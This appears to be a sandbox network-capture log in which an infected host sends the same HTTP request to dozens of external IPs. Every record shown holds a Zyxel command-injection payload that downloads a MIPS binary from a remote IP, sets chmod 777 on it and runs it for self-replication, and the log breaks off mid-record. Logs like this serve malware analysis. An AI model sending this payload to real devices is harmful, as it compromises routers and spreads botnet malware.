                                    Jan 13, 2024 19:02:38.267800093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5369192.168.2.1334642103.35.171.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267844915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5370192.168.2.133733254.99.158.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267934084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5371192.168.2.1346474210.221.211.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267971992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5372192.168.2.134273427.33.169.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268013000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5373192.168.2.1348990199.245.148.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268101931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5374192.168.2.1358694181.168.99.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268151045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5375192.168.2.1335308145.204.240.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268208027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5376192.168.2.1358688123.222.109.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268251896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5377192.168.2.13572729.50.79.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268300056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5378192.168.2.1351068196.199.232.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268342972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5379192.168.2.1334094162.190.223.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268418074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5380192.168.2.1335778133.40.211.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268471003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5381192.168.2.134398627.39.3.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268522978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5382192.168.2.1341416184.79.24.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268589020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5383192.168.2.1360932210.223.53.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268634081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5384192.168.2.1360664109.244.42.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268693924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5385192.168.2.13574962.180.166.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268731117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5386192.168.2.1356596151.187.95.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268759012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5387192.168.2.1333960113.4.146.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268815994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5388192.168.2.1349250216.23.194.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268873930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5389192.168.2.133793061.19.18.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268913031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5390192.168.2.1341878165.138.252.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.268978119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5391192.168.2.1354900186.28.49.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269052982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5392192.168.2.1344086128.119.168.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269097090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5393192.168.2.135790260.120.170.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269155025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5394192.168.2.134162864.188.139.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269205093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5395192.168.2.133433095.70.47.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269275904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5396192.168.2.1343908167.185.197.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269315004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5397192.168.2.1351282160.36.159.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269351959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5398192.168.2.1335964118.117.47.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269388914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5399192.168.2.134660469.136.13.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269469023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5400192.168.2.1339764152.239.125.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269514084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5401192.168.2.134320051.21.58.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269567966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5402192.168.2.1348778169.14.49.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269608021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5403192.168.2.135063051.172.249.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269644976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5404192.168.2.1358900155.172.240.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269707918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5405192.168.2.134629238.179.126.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269737959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5406192.168.2.136014097.26.167.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269788027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5407192.168.2.1359252218.205.6.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269840956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5408192.168.2.1339124164.104.8.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269901037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5409192.168.2.133581889.215.94.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269948006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5410192.168.2.1339598169.43.167.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.269982100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5411192.168.2.133475079.245.2.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270059109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5412192.168.2.1340632166.240.21.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270117998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5413192.168.2.1344056131.200.53.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270175934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5414192.168.2.1346806170.136.205.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270241022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5415192.168.2.133848813.61.252.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270301104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5416192.168.2.1338966217.151.169.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270351887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5417192.168.2.134923664.191.89.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270423889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5418192.168.2.1341454181.26.229.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270468950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5419192.168.2.1339082209.0.27.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270519972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5420192.168.2.1336152148.166.38.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270572901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5421192.168.2.1357102151.228.169.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270657063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5422192.168.2.1341550173.59.176.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270678043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5423192.168.2.1356032219.74.57.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270739079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5424192.168.2.134447285.156.45.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270796061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5425192.168.2.1359048165.12.102.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270824909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5426192.168.2.1352008216.79.133.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270912886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5427192.168.2.1343744159.53.92.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.270979881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5428192.168.2.1354840185.29.126.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271050930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5429192.168.2.1346976116.161.249.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271097898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5430192.168.2.136021639.4.44.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271202087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5431192.168.2.1350658195.83.175.12443
                                    TimestampBytes transferredDirectionData
